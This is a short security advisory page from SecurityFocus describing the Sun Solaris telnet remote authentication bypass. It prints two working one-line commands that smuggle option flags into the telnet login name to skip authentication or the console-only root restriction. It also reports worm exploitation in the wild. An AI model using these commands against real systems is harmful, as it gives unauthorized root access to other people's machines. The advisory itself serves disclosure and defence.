Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Sun Solaris Telnet Remote Authentication Bypass Vulnerability

Attackers may exploit this issue with a telnet client.

The following command demonstrates this issue:

telnet -l-f<user> <hostname>

Or, attackers may execute the following command to bypass the console-only superuser authentication:

telnet -l-d/dev/console <hostname>

Note that in this case, just the requirement for console-only superuser logins will be bypassed, not the remote authentication.

Reports indicate that this issue is being exploited in the wild by a malicious worm.

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.







 

Privacy Statement
Copyright 2009, SecurityFocus